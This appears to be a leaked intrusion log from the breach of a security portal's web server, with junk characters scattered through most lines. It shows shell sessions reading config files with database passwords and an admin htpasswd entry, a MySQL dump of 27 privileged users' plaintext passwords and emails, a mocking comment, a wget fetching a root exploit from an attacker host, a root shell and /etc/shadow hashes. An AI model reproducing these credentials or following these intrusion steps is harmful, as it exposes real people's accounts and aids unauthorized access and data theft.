+ q( u1 c3 j/ W3 V+ wdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..- B6 e" }" _" J( L
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
* Q9 w/ x# j- Q* p; Z8 M7 k# Hdrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql+ K; `, R2 ]3 g. u4 |4 |: X
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com) q3 m# ^3 Y* {+ D: }
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend- ]3 v; T8 W u- n- l1 W
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner& }/ c/ C" _4 v& q
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
2 h; t6 s6 E5 @" I5 R/ e0 }drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
' m* f+ p7 [$ M1 \3 ?drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron- Y; {4 u1 X) h
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
% W; w( K, M2 S: t f1 t% k-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
- [4 _0 s0 C1 K/ @; z* ?8 f-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
m+ B8 x% n( ^0 c! Kdrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
1 e* W O' w8 F: ]# sdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
' W5 g+ r0 J- k) h! P-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess/ ]8 \+ P- T- y! x. e. | g$ \) v
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess0 g5 s2 X; p; }9 T4 e; Q6 {2 h2 T
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
! S' p p; X& Y7 h-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html0 B9 o' N5 L _2 G: u3 R6 X3 c
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
, [& H7 \1 ^" k: i-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
! B5 u) D3 p$ R/ p-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf) G2 H' E* D+ D6 Q1 m* a
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc4 W: I5 e- z8 c
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
4 [: e0 o+ c8 q" ~+ j- Zdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
; b( N7 K- e( pdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
( y. r6 U. ]/ I6 G9 Qdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member. |3 H: [- h1 n8 G* i: d/ I
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
3 ~9 B* f& i1 Idrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
5 G& ?7 c- c& X l! Q n& N8 ]- N5 s-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf2 j8 c6 T: T! [: W' a; u
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re% J+ i6 i+ F( r
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
' l. Y- C3 G4 s1 U% A/ G$ [$ sdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss) E; Y3 {# T2 u/ v: \- `2 l8 f
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
) x+ q- p0 t7 a4 hdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
# o6 i8 D5 V7 sdrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes ~; R$ H4 n& B/ D" O5 s6 j
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src; M8 ^+ R" h4 ^& D0 ~: |. C
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl* R! Z3 X2 ^# Y6 W
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
( X% o8 d; u2 _, M6 |9 K! rdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
- p6 d# N' ~- L0 z-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
, h/ J2 @* K& Z% p/ qdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki6 ?& E- q6 S% Y* P Z
! ~' H4 ?, E+ Q; Q, X' ]4 S4 \sh-3.2$ head -20 index.php5 E: ?- a8 h) u( o
<?PHP/ ?5 x4 Q% \7 d* E/ F
/**
# D- r7 Y6 @! u0 B. J! _4 n, h* Mainfile (external) for astalavistaNET v2.0) j4 v9 E+ j* t0 D- B
*
* E7 P6 ]( h- X* @copyright Astalavista IT Engineering GmbH
/ c% t& v: D( N. ~+ A* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>0 h) j: i4 M: a9 ~3 B; N$ X' P
* @version 1.0
8 A$ I* |' {8 ^% y( {8 C*/
* A- A& V$ v- S( x S4 H
( Q8 f! l) b7 M6 d# B9 e8 v if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
7 e9 [* o3 m& ? F% m $dontStartSession = false;
0 J, O" y6 i3 s9 m* Z) s2 Q# e0 T } else {
5 L/ @6 O& u4 ~ G3 o8 C $dontStartSession = true;
" T. M+ P8 w r" f. Y' v; x* z- k p }3 M4 x( a7 V6 D
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);9 J! w5 ?' K4 ~8 E
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);' o0 F5 f4 g. V6 P0 x
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
. a/ n, K. e+ e" p( [8 h require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
( C+ p9 Q/ a& M* K/ `- M# `% ^' {! c/ t9 P& B
sh-3.2$ cd config
/ _4 g( q+ w5 I7 C( X: msh-3.2$ ls -la6 ^+ J% P; C7 v
total 32
! |3 S, } b. _5 N4 h# k* ?drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
1 @. j$ o9 M" \0 ?4 ?* cdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..0 y# c) u2 a" I4 [* g# h
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php& X; r; |- h, t2 G
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php. { X$ R0 ~+ n* x) N
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
" j i w5 @ x1 @5 b2 `& k: {-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
3 ]: U& z: w3 ?. b' k-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
; d! f, v: N n g6 f6 T/ k& j2 G9 R" c
sh-3.2$ cat com.conf.php
0 Z K. `# t$ Y- f' }* R[snip]# u, s4 y. h6 k4 V. [ [$ ?
//member-database
# w7 y8 i: `, i+ [ H' f$_CONFIG['db_mem_server'] = ‘localhost’;
1 ?; Q, ?& d0 |$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
, Q+ _. U0 t+ Q7 W+ Q( g$_CONFIG['db_mem_user'] = ‘astanet_db’;' N) z! `0 h6 }4 S P% W6 _0 C
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;1 R0 Z/ g- A( Q0 m' D
$_CONFIG['db_mem_debug'] = false; //true or false
, ?+ q$ K, L/ X# p9 z7 N//ads-database
6 X+ V3 g4 _* c, R4 x' t- O$_CONFIG['db_ads_server'] = ‘localhost’;9 ~9 S# N+ }* O4 ]2 w! q, \
$_CONFIG['db_ads_database'] = ‘astanet_ads’;" | O- D5 B+ ~+ ^" A7 r* E+ U1 i/ J
$_CONFIG['db_ads_user'] = ‘astanet_db’;, Y3 J) n+ {( A
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;3 E" D7 r/ [& S, r
$_CONFIG['db_ads_debug'] = false; //true or false* H8 v* C) n' J! x
//rainbow-database
/ M! C, `( u- ?, Q1 P5 A$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;0 M N1 r. M8 f r. R8 P' V" Y
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
' z( O. Y- l; |4 z* N$_CONFIG['db_rainbow_user'] = ‘dinu’;1 ]" y5 T3 m. k, W3 `/ ^/ N( ]
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;2 R: w! E. ~2 W
$_CONFIG['db_rainbow_debug'] = false; //true or false' t% [: T1 Z) ?
//mailing lists database
) ~/ k- h3 f; z' @$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
9 f; ?8 |( N: |# ? |2 e& E4 k$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
1 w. O& d6 Y9 {8 O$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
0 }4 d2 n% u8 g1 k r: [5 f$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;4 E2 y. d7 |' A: ?/ r! ]+ i' H
$_CONFIG['db_mailing_lists_debug'] = false; //true or false2 S; ]* X/ W% h' Q& J
//paypal
4 f) F7 U" c N$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
7 X4 C k7 D$ H, `$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
. f! d2 }! f! G) A$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
5 y7 V6 j4 e: k G m$_CONFIG['sub_pp_noship'] = ‘1′;. V( v8 {( }* Q0 `, ^
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
$ f8 L+ {7 h" J) o. K. i[snip]5 P( }6 f3 A2 X9 S8 d# e
, s+ {! u* v9 f+ D! v* u0 @sh-3.2$ cd ..
/ b! i4 I+ P; q9 [( lsh-3.2$ cd member
% i6 w% Y% h) r e h9 \8 G1 ish-3.2$ ls -la
; W f9 J; `8 ? Q" X- `total 209 n' K) J/ ~0 X$ ]: e) p/ W) y+ r: _
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .5 A8 C. |" v& i: E
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
9 i. N' g6 x C$ j; o# h-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess( H$ Z# R! F% Y7 {4 g+ w+ }
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php5 |! ]4 W9 j2 Z' j1 W, }
sh-3.2$ cat .htaccess
& ^, p$ z, T" N- l. z. J* QSecFilterEngine off
% V/ h" V/ B' U9 v( n' R: \, w& `% [9 b* ^: R. p* q8 ^
sh-3.2$ cd ..
; V! j# p) t2 {sh-3.2$ cd cron* p% @4 _9 L& O
sh-3.2$ ls -la
7 i: M9 q$ ^4 btotal 168
0 r( V" B' {' j5 w4 N% q+ F( w0 udrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .7 s$ u) R& o/ \" u
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ... J8 u" r( Q* b+ \
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php9 F/ g/ v/ N. L2 ^4 q E5 l
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php5 H; C$ b5 s# X! \8 V5 u
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
, H' j) z$ Z; B' R W0 P3 H-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php8 _2 r' s4 D4 v# r3 Y6 a7 s
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php( ?- V& I- m- T0 U3 u
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php. ]" \8 X: A" M3 d& w* r8 j
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
" `9 A5 V: a' k9 Y) e-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php A6 Z; q$ R9 ~) }
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
2 j' O3 N$ e# j6 ^-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php. C V6 D# H7 q, a4 x
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
' s9 p+ G6 s* G2 D; }; P-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
& G9 N8 h H6 b% }; P. m2 X2 D& v6 L-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh, O0 I$ T. ^3 z) m S% ~5 D
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
- ]2 P( i6 ?( _4 L$ o-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
4 [" _4 O/ s. ?; T' ]-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php3 Q/ ^0 w$ q6 v7 K
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
3 x1 U5 E- y5 @+ P1 P-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php; W, x' P8 [: W8 q5 _2 ^" @' o
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
* b/ ?" T# G, y-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php9 B" E5 f# ]# {0 w4 }
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
2 W- {& q/ {/ a( S4 _# y4 e9 t7 T" o, I. I. z- o& M3 G
sh-3.2$ cd ..
) ?( A _0 \. y+ m4 C4 x, m \sh-3.2$ cd _007! F# A, R: P( ^
sh-3.2$ ls -la
9 i' I8 i3 t, X( ?5 Z( btotal 240 z5 E) N* j7 P0 s( K7 p9 m, b
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .# Y/ v4 C" J- P0 D) ^2 o
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
6 Y8 D: [( l2 q7 o- I: D; Y-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess: _6 M' z2 ^. ^
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php: j% t" {. e* |' j! X* E! d
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php' D* V2 c1 V |3 y! J& |
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
, a3 Q2 R$ v; e% k' v' d) z; \- M c8 l3 S9 {2 T
sh-3.2$ cat .htaccess
# Y7 a- |$ R* L: Z6 z* n% l& QauthType Basic+ {* U( z2 ~; k9 B8 `
authName Admin7 }5 f" F1 m5 P" d* w% @
authUserFile /home/astanet/auth/.htadm_pwd
9 m# b4 R# i+ A6 [9 Z' A+ mrequire valid-user
/ b `! J6 O( X( V! r8 I9 n6 F4 R. Q! K) E/ {* g# P
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
5 _8 x5 I4 O: |$ u$ xadmin2net:CR0bl65MwhfT" f: {9 B/ m0 s) C
" D" i/ c+ ?& l5 @sh-3.2$ mysql -u astanet_db -p$ H; x4 ~' O/ {! c
Enter password:& `5 d6 x6 @7 h3 g- C; p
Welcome to the MySQL monitor. Commands end with ; or \g.; H) W; o+ T0 b+ t
Your MySQL connection id is 2751532 A3 c' j |# q3 B) [$ f9 w/ V
Server version: 5.0.45-community-log MySQL Community Edition (GPL)/ P- v2 y5 w- [8 K6 U
) I' n+ g) T" P* Z: yType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
7 n* [ ]$ [% |2 i* T) a( e. W+ | `/ Q1 ` }
mysql> show databases;& B- S* l% \: b+ P
+———————–+
( {6 r: d% o1 {% l( R/ B+ P| Database |
1 d! o- d& H; `, _' x! Q2 Q0 g+———————–+0 C s( c& D2 P6 v) K+ \
| information_schema |
$ @6 {) Z: q1 {* Z| astanet_ads |( w# R3 G, Q: i" T% V
| astanet_mailing_lists |
2 X6 H' d5 p0 _6 j| astanet_mediawiki |1 c7 G, r9 ~9 @* t1 ]
| astanet_membersystem |
; j: ]7 X1 L1 U| test |2 f0 u( d/ c3 G
+———————–+% d+ M+ O, |( P! m2 M" K; y# C0 }
6 rows in set (0.00 sec)0 e- U* s0 \2 S4 h
* b, R% L! n" T, A' [$ J
mysql> use astanet_membersystem. ]% b$ N k# o6 }/ o3 v
Database changed) d0 Z: I5 {$ f! q
mysql> show tables;# i! m7 s! a, B5 \' [
+———————————–+
5 [5 s& K+ }: X| Tables_in_astanet_membersystem |
8 z$ W2 p8 y4 ]/ \) |( f9 ~0 F+———————————–+8 D7 [( }7 Q9 o* s8 m
| blacklist_categories |
. ?$ n0 w2 I+ m! V1 g. c8 C| blacklist_content |
3 Z0 h' w/ z4 `# {; j| blacklist_levels |
7 w8 J1 {# q7 v2 i| blacklist_mcset |
+ v2 Q. z5 J# M, w4 i' h; z4 T| dir_categories |
( E7 `1 }8 K: N% C6 m- T| dir_comments |& j9 s W; d2 c2 O; ?$ N4 g
| dir_links |
* M/ k9 P+ H7 k| dir_temp |3 ]( f9 D1 W5 X5 r+ m) \6 v
| dir_votes |) m7 N% ` E6 c
| documents |
' e5 S2 f5 w3 a, { K1 ^" Q- p| documents_categories |
9 {, m y4 e8 K| email_content |5 y7 C2 D' {! v+ ~
| email_settings |
- T" ] b# C& {8 J* P| exploits |+ Q, k+ p6 |3 B4 p/ W* F/ {, j
| exploits_categories |2 O5 a& o4 {: {$ {+ y( ^2 V/ W
| exploittree_categories |: ~. Y6 j. |% o4 u# D* T% K9 z* G
| exploittree_exploits |3 i' P# _. _! g0 ~: H( W$ W
| home_values |& I2 _- G! `2 c& f# T6 n
| iso_countries |
5 l3 M; j; |8 S1 {8 g1 t/ t! J| links_categories |
& h: `, b$ w k2 \| links_records |
6 m: ^ w1 x7 t# G| links_unauth |
: [) ], e& A" M9 S| links_votes |. {+ d- ?% H* N v# {
| log |
+ h( j) G4 t- |$ x1 I) B- M( t| news_categories |
: u# h0 h L6 c/ S8 F' Q| news_comments |/ g' t6 g" y0 ~* G5 E$ s( ^
| news_emoticons |
4 R+ o2 _. [& b, g* M4 C( I| news_latest |
# L, G$ \( F$ `# I- b* X8 G| news_messages |
, p- I# _7 }; L+ ]| news_statistics |/ w/ W9 A _& r @/ u
| news_votes |
, ~8 v+ e; p8 M| prices_content | B+ N/ e$ f1 p3 o
| prices_offers |4 ~/ A6 N) e+ V# }8 Z) T
| rss_settings |& ?4 t3 _$ s2 B4 L9 G
| sessions |" k8 N6 A" b, ?; s! j. h
| stats_signups |
8 D- h% R- ?0 E a9 _! w; \. [| u2u2 |+ [! _& D& a2 k" o! s6 Z/ b
| u2u_contact |1 e- s9 W; B+ V1 Q3 w
| u2u_settings |" ]. d' z0 m! c- ?
| user_keywords_selected_categories |0 i. V; } d+ b! ~: r# A
| users |
. }+ r! N, M. D% ~| users_ipn_test |# e3 k& k( m8 |: K2 O6 Y
| users_keyword_values | Q5 l. w/ ]8 B- {2 }- F% Y
| users_profile |
+ a( o$ h+ @% y$ p2 D+ [% |3 q| users_temp | `; ~& k& \9 F p% }4 A
| users_upgrade |
# F$ c! O- A6 m8 {& }+———————————–+; e0 q @; O7 ~4 o7 A& i- G
46 rows in set (0.00 sec)
1 B0 T9 y0 j% r- b. ]9 P9 M' ?4 P- I% U! K
mysql> describe users;4 Y& q1 n" Q% \/ {% \7 P8 g
+————————–+————————————–+——+—–+———————+—————-+' e2 R6 D( U! x2 o; F
| Field | Type | Null | Key | Default | Extra |
3 T3 Q: r6 w' g( n- {% Y+————————–+————————————–+——+—–+———————+—————-+- c& Z1 N6 A; T. u) ^6 O
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |2 M+ p0 P% ^3 t, o7 i
| user | varchar(50) | NO | | | |2 ^, o; P8 g. M
| nickname | varchar(30) | NO | MUL | anonymous | |: M. @4 A4 p3 n
| password | varchar(30) | NO | | | |# W) y: Z4 O! m$ X+ y
| userlevel | tinyint(3) | YES | MUL | NULL | |
, @, r$ y- I& |+ u6 w7 O8 V| exp | int(8) unsigned | NO | | 0 | |, D0 m& b- ]5 s4 ]4 j
| email | varchar(50) | NO | | | |
, K5 A% R3 X1 `, r) g$ o# t| ip | varchar(15) | NO | | 0 | |
/ m8 l [: h+ Y% z| proxy | set(’0′,’1′) | NO | | 0 | |2 v; Z, b+ n* O3 n" \$ l/ W
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |/ H0 n( f+ M' s6 x$ [1 u
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
, {' k- ?# C+ a$ Q| anz_in | tinyint(1) | NO | | -1 | |) t l6 U* `+ t
| status | tinyint(1) unsigned | NO | | 0 | |8 h# ?; e1 j, e8 w N7 m9 l, I* A
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
[) K% ~/ |. b7 X. Z| freemember | set(’0′,’1′) | NO | | 0 | |
8 [" ?! E% ~0 c/ o8 M* F; R; C7 t N| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
- q% m9 f; _! S| lang | tinytext | NO | | | |
! e1 M# V5 q& H# N q! [# A| adid | smallint(6) | NO | | 0 | |% ^9 [# ]/ v8 x% O
| pp_txn_id | varchar(255) | YES | | NULL | |
3 s E" `9 z$ u: F6 F7 G. U| cnb_transaction_id | varchar(255) | YES | | NULL | |# U+ u; @, p6 P7 i
| cnb_order_id | varchar(255) | YES | | NULL | |9 N% M8 Y, \5 i( X, F% F
| cnb_user_id | int(11) | YES | | 0 | |
% t7 A: A, P" P F$ m+————————–+————————————–+——+—–+———————+—————-+
' n& f$ O3 j2 H u8 w- z22 rows in set (0.01 sec)
' x+ R7 N4 S" [7 m
/ I. I S1 J5 Imysql> select count(*) as skids from users;
9 U7 t0 C( E; \! e+——-+" w3 E1 J2 \2 J
| skids |; w& Y% g. r) n" ^9 A7 r, [
+——-+
5 i! S( u! R0 v3 e0 H& B| 25199 |- v! s; u; p5 U
+——-+; Y3 a( p0 _0 E
1 row in set (0.00 sec)1 \4 I9 _; E: z5 r/ w
0 x; k/ X9 ?2 j3 `5 g& u c( C5 f3 z
mysql> select user,nickname,password,email from users where userlevel = 1;
% K4 w1 _( S4 Z5 G. A* E0 l+————————–+———————-+——————+———————————–+* |" e! H/ \* X6 j- o2 i2 d
| user | nickname | password | email |
& C5 |8 N6 c$ j+————————–+———————-+——————+———————————–+ [" j/ u- E# o) @
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |9 e' c+ d# g6 r& F7 X7 I
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |/ k9 P, H D( s U) Q2 i, r
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
3 C& W7 h5 p- p! g: U) S| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
$ u. M- P" ~; Q/ |3 _* || Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |7 H9 `8 g' k6 V6 {0 U. R% o
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |! N% E! X$ Y) u U( K
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
1 J3 t6 E7 U! L/ G0 K, J7 y| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
4 |* T, O. D/ U) n" P+ Y2 ~; e| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
4 L) h6 V5 ?3 p6 t" a7 f- m, p4 z, d| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
2 d- |: T* y% _| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |# P" }9 w' ?6 D7 D$ t0 F
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
" P' }) a! ?" G4 M! U$ X| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
6 q/ c0 m& o3 ^' M- d/ H6 d* y3 c| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
9 z) ~4 g5 A' E1 ]| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
$ Y7 i+ J9 G; O$ E| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
* K7 S- C$ s H- Y# w% p! x| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
$ ?9 j* u8 k3 W- F+ A+ _| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |" G$ q: M2 x' [ b! O
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
; X2 e8 a- c; f q4 ~| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
* `; v1 M4 S$ f| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
, }5 @. r A+ P5 Q; N| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |- _" f2 e7 c( g$ ~" k" {: k: \) Q
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |) s8 X' ~( v0 Q7 _+ g7 y
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
/ M. @2 p% {! l ]" K| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
4 W @8 N7 L5 e, n. M| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
/ k4 W3 V. E; u) x1 p5 I| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |) D+ a+ E2 \/ r d
+————————–+———————-+——————+———————————–+! A( o* P/ Y8 W$ A
27 rows in set (0.00 sec); ]% [6 n4 c6 x9 G
/ z; ]7 ]& M1 H, F5 jmysql> exit;' l! ?3 d6 C+ E3 b) v F
Bye
* C9 ~0 Q5 P @+ ]. @. i
9 w9 |$ q$ o% U# E[~] plaintext passwords? yes,4 t& o; E2 R7 b6 T+ I F+ M
Those so called “security professionals” who charge you $6.66 / month to$ G* }0 g3 b$ K8 [# K4 z
register at their hack-proof portal, save your passwords in plaintext…' U+ r" r* q+ R! j' g; Q
brilliant!
" }# C/ T2 Y+ y5 N' X2 `0 e& A* V$ h4 ^0 W; p+ z* w$ a
[~] This been fun but we want more.
6 ?, {, s; m* j2 V$ `; a& [. i1 M4 x1 { {. g2 [5 [2 c
sh-3.2$ uname -a& S- }1 o" E3 x% z' X
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
7 r9 @6 y3 I- w) v% _( O9 ]0 Ush-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
Q& t5 f4 L8 E+ N( |9 G–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
+ k" H% s9 z( {8 u3 _; X3 F8 e9 eResolving anti.sec.labs… 13.33.33.37( B- f8 T9 b5 m: M) z: C# c
Connecting to anti.sec.labs|13.33.33.37|:80… connected.9 X. G# [( r6 t" S" s
HTTP request sent, awaiting response… 200 OK
: B% L/ P4 x- _& [; bLength: 18200 (18K) [text/plain]% e: W+ J s# f( T( b0 [% U" d. p
Saving to: `g0troot’- r# x' C: l( h" c" T
" X$ b o/ y8 I/ e! ]- t( R/ A
100%[=========================================================================================================================================>] 18,200 58.6K/s in8 S' Z4 _3 j% g# r" V4 f& z: A' N
0.3s* X% A% ^& i% ^3 W6 C& c% a
7 x* P* I: t0 h& [" ?$ R4 J18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]" \! G) I) l7 @- T. r! U! E7 ?
5 O9 ]# i4 |* x( T, E
sh-3.2$ ./g0troot -i x86_64
8 Y1 G* x1 a0 ?, R) m0 H; A9 d[+] g0troot - anti.sec.labs9 A: s& n* ^! e, S: N5 a3 p
[+] Target: 2.6.18-128.1.10.el5+ g% I& S$ ~% n7 S' f: r
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
4 Q5 d# b$ M: L% ]8 Q. s
6 v+ G+ l1 } s" S' ][+] r00tr00t
: E& F' b1 O7 J" s" U0 {[~] Executing shell… i9 `+ o; _2 W- E" b
1 i% y% T8 P1 K# a
sh-3.2# id& U( I" e' g) m# g; }' E8 O% N5 c
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
, i. J, }/ I4 n: K/ o5 ]2 E S, i) R! i
sh-3.2# cat /etc/shadow
6 a! B- d4 g* w" B- Qroot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
! k. A. K- d& r- l( G[snip]: D1 S# {, s& s- ?
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
( m1 n- v3 S8 qjon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
3 r% f+ Y( G: h* z# Rcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::% r& ^2 B* ]3 a% [/ j* H9 a
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
3 M3 m7 U4 ]% C$ p! R' K7 r2 }) g3 b. G+ `+ ^6 s
